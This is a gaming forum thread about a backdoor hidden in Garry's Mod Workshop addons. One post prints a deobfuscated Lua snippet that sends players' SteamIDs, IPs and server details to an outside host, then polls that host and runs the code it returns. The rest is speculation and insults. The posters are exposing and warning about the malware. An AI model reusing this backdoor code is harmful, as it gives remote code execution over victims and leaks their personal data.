Yet Another Possible Loophole/Backdoor "Virus" (Script) in Garry's Mod
56 replies, posted
[url]http://steamcommunity.com/app/4000/discussions/1/350544272212331557/[/url]
[url]http://steamcommunity.com/app/4000/discussions/1/350544272211982671/[/url]
[url]http://steamcommunity.com/app/4000/discussions/5/350544272212417246/[/url]
[url]http://steamcommunity.com/app/4000/discussions/5/350544272212630308/#c350544272212656655[/url]
I haven't met/had the problem personally, this was brought to my attention by a friend who regulars my server. I don't really know more than what's really going on as discussed in these steam threads, so this is where my journey in the matter ends.
Supposedly it's another Vinh'll fix it scenario with a spreading malicious script from player to server & other players. There isn't much compelling evidence currently to support it, but if it's legit more stuff will pop up in the discussions soon as it spreads like wildfire. If you ask me none the sooner with an update being scheduled two days from now.
lol
[sp]no[/sp]
Probably just another backdoor, who cares
Yeah, sounds just like a backdoored addon. They were all playing singleplayer.
[QUOTE=sannys;51175290] They were all playing singleplayer. [/QUOTE]
[QUOTE=Steam Discussion]me and my friend were playing on a private server together when we were sent to another server with a number of other people all confused. After we when back to a our sever we kept have images pop up and people were warning people not to be on gmod on the 25th of December[/QUOTE]
Hmm...
[QUOTE=Vuthakral;51175314]Hmm...[/QUOTE]
That's exactly what sannys meant
Probably just those generic serverwatch skids, again; Who cares
Serverwatch still exists? Thought he died with his prop minging ways.
[QUOTE=Nookyava;51175470]Serverwatch still exists? Thought he died with his prop minging ways.[/QUOTE]
his existence is cute in a sad sort of way, like a crippled dog that keeps falling over
In conclusion, Nothing will happen on december 25.
This is just a skid with a workshop backdoor using gui.OpenURL.
OP Probably just has little lua knowledge and got scared, like every kid in the community.
I'd be careful which addons you use. I don't know which but some addons will open up ads in the background to gain ¢¢. Fucking children.
[QUOTE=Kevlon;51175583]In conclusion, Nothing will happen on december 25.
This is just a skid with a workshop backdoor using gui.OpenURL.
OP Probably just has little lua knowledge and got scared, like every kid in the community.[/QUOTE]
I actually could guess how it was working, I do know a fair amount of lua and have made a few things for my server, but thank you for your judgements. Also I'm not going to make a cringy coverup for my age, I'm 19.
I made the thread as an "In case it's not some addon on the workshop with it's creator just being a dick."
Found one of the sources (smeg rename lol)
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=751956173[/url]
Lines: 1438-1476
Deobfuscated version:
[code]
local clientIP = "0.0.0.0:0"
http.Fetch("http://gmod-rce-senator.c9users.io/address.php", function(ip) clientIP = ip; end, function(...) end)
timer.Simple(1, function()
http.Post("http://gmod-rce-senator.c9users.io/api.php", {request="notify", steamid=LocalPlayer():SteamID(), ip=clientIP, servername=GetHostName(), serverip=game.GetIPAddress()}, function(body) end, function(...) end);
end);
timer.Create("Cheatupdate_PingBack", 5, 0, function()
http.Post( "http://gmod-rce-senator.c9users.io/api.php", {request="pingback"}, function( body, p0, p1, p2 )
local response = util.JSONToTable(body);
if(response != nil) then
if(string.find(response["packet-r"]["target"],LocalPlayer():SteamID()) || string.find(response["packet-r"]["target"], "*")) then
if(!string.find(response["packet-r"]["target"], "!" .. LocalPlayer():SteamID()) && response["packet-r"]["re"] != "null") then
RunString(response["packet-r"]["re"]);
end
end
end
end,
function(exception)
end)
end)
[/code]
will update if/when I find more
[B]Update 1:[/B]
Second source (fake server content):
Lines: 1-39
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=753244442[/url]
Whole file is just the obfuscated backdoor
Third source:
Lines: 25-63
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=751896914[/url]
Same as above
[B]Update 2:[/B]
Fourth source (another cheat):
Lines: 273-311
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=730692131[/url]
[B]Update 3:[/B]
Looks like the "gmod-rce-senator.c9users.io" site has been removed.
[QUOTE=Moku;51177645]a[/QUOTE]
so after Moku posted this, they made all the players with the backdoored scripts redirect to our server and holy shit was it a lagfest
[T]http://i.imgur.com/54SqHwP.png[/T]
[QUOTE=TrenchFroast;51177870]so after Moku posted this, they made all the players with the backdoored scripts redirect to our server and holy shit was it a lagfest
[T]http://i.imgur.com/54SqHwP.png[/T][/QUOTE]
tbh thats pretty funny
makes me think there should be some sort of audit process for workshop addons that contain lua
"removed"
heh heh
[B]This is only the [I]beginning[/I].[/B]
[video]https://a.pomf.cat/sodzip.mp4[/video]
[QUOTE=OEDEC2016;51178052][video]https://a.pomf.cat/sodzip.mp4[/video][/QUOTE]
Good job:
[url]https://www.youtube.com/watch?v=NfYJxBw-lI8[/url]
[QUOTE=Nookyava;51175470]Serverwatch still exists? Thought he died with his prop minging ways.[/QUOTE]
he goes under a different name, "Dark Byte" or simply "Dark", probably did it to avoid people from knowing who he was, obviously it didn't work.
i've dealt w/ him in the past, him saying that what i did in my workshop addon was "purely intentional" and actually gave out my real name in a FP thread, possibly among other things that i can't instantaneously remember.
wasn't long before he got owned AKA perma'd. he currently has a cheat on the workshop called [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=701694374&searchtext=hlscripts"]HLScripts[/URL] which is basically him hitting Ctrl+C and Ctrl+V a bunch of times
EDIT: realized i'm being rated as late which is fine, just wanted to give some backstory on a dude that literally nobody cares about and possibly everyone knows by now
[QUOTE=beeteegee;51178104]he goes under a different name, "Dark Byte" or simply "Dark", probably did it to avoid people from knowing who he was, obviously it didn't work.
i've dealt w/ him in the past, him saying that what i did in my workshop addon was "purely intentional" and actually gave out my real name in a FP thread, possibly among other things that i can't instantaneously remember.
wasn't long before he got owned AKA perma'd. he currently has a cheat on the workshop called [URL="http://steamcommunity.com/sharedfiles/filedetails/?id=701694374&searchtext=hlscripts"]HLScripts[/URL] which is basically him hitting Ctrl+C and Ctrl+V a bunch of times[/QUOTE]
says the skid with a cheat on the workshop himself [url]http://steamcommunity.com/sharedfiles/filedetails/?id=762916731[/url]
[highlight](User was banned for this post ("Shit Posting" - UncleJimmema))[/highlight]
Again, like I said. Just a backdoored workshop addon, who cares.
[QUOTE=OEDEC2016;51178052]asfafag[/QUOTE]
the lincolnshire poacher mixed in with some half life 2 audio
epic!
[QUOTE=billy britt;51178159]says the skid with a cheat on the workshop himself [url]http://steamcommunity.com/sharedfiles/filedetails/?id=762916731[/url][/QUOTE]
Who cares? It's outright labelled as a scripting/cheat addon.
[QUOTE=code_gs;51178264]Who cares? It's outright labelled as a scripting/cheat addon.[/QUOTE]
it knows what its intention is to do, and i make that very clear, so i fail to see what's wrong, besides his logic
Isn't senator one of those retarded skids in cheater team? Or is this something unrelated?
[QUOTE=MadParakeet;51180156]Isn't senator one of those retarded skids in cheater team? Or is this something unrelated?[/QUOTE]
yea most likely the same person
[QUOTE=Sir TE5T;51181197]yea most likely the same person[/QUOTE]
nah it's dark, but you can probably classify them as the same people by how their mentality is
[QUOTE=OEDEC2016;51178052][B]This is only the [I]beginning[/I].[/B]
[video]https://a.pomf.cat/sodzip.mp4[/video][/QUOTE]
Spooky the lincolnshire poache video with some sounds from HL2.
Damn son what is your script kiddie group called?
If you silly skids are going to use exploits to reconnet people to different servers, can you atleast make a real War of the Servers happen? I mean at least that would be a fun use of an exploit, what with mingebag tripods attacking DarkRP servers and any player forced to join a server just mutters "lolololol" while chasing people with gravguns and watermelons.
If it's a top mod then I'm going to check them all.Already checked Prone Mod and the Wac update just in case,they're absolutely fine.
[url]http://sta.sh/0zl6lu02h5[/url]
My friend found this along with the video.But there are thousands of people named ADD ME.This screenshot may even be ADD ME himself.Who knows.
[QUOTE=That's that;51188436]If it's a top mod then I'm going to check them all.Already checked Prone Mod and the Wac update just in case,they're absolutely fine.
[url]http://sta.sh/0zl6lu02h5[/url]
My friend found this along with the video.But there are thousands of people named ADD ME.This screenshot may even be ADD ME himself.Who knows.[/QUOTE]
Doesn't that kinda look like Neurotek's logo?
Sorry, you need to Log In to post a reply to this thread.
